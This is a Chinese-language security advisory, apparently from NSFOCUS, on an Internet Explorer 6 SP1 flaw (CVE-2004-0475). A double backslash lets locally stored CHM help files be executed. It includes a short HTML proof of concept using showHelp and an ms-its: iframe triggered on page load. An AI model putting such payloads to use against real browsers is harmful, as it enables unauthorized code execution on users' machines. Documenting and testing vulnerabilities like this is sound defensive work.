安全研究
安全漏洞
Microsoft Internet Explorer双反斜线CHM文件执行漏洞
发布日期:2004-05-14
更新日期:2004-05-20
受影响系统:Microsoft Internet Explorer 6.0SP1
描述:
BUGTRAQ ID:
10348
CVE(CAN) ID:
CVE-2004-0475
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer存在问题,远程攻击者可以利用这个漏洞未授权执行本地存储的CHM文件。
虽然之前的IE补丁已经修补了Showhelp执行CHM文件,但是由于协议处理器不正确处理"\",当"\\"放置在目标CHM文件名之前时, 就会在HELP文件夹中搜索此名,如果HELP文件夹不包含此文件,就会转向ROOT目录中搜索,如果文件被搜索到就会被执行。不过此执行需要本地电脑域执行,攻击者需要利用其他漏洞绕过本地电脑安全域。
攻击者可以构建恶意链接,诱使用户处理。
<*来源:Roozbeh Afrasiabi (
roozbeh_afrasiabi@yahoo.com)
链接:
http://www.securityfocus.com/archive/1/363202
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roozbeh Afrasiabi (
roozbeh_afrasiabi@yahoo.com)提供了如下测试方法:
<html>
<head>
<title>POC</title>
<p><br><b>HTM help file opened in an iframe</b><br><br>
<iframe id="target" width="700" height="400" src="ms-its:" name="target" scrolling="yes">
</iframe>
<!----SCRIPT LANGUAGE=javascript>
function getlink(){
showHelp("ms-its:\\ntshared.chm::/copyright.htm");
target.location="ms-its:\\ntshared.chm::/copyright.htm";
}
<!-----/script>
</head>
<body onload=getlink()>
</body>
</html>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:4245
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |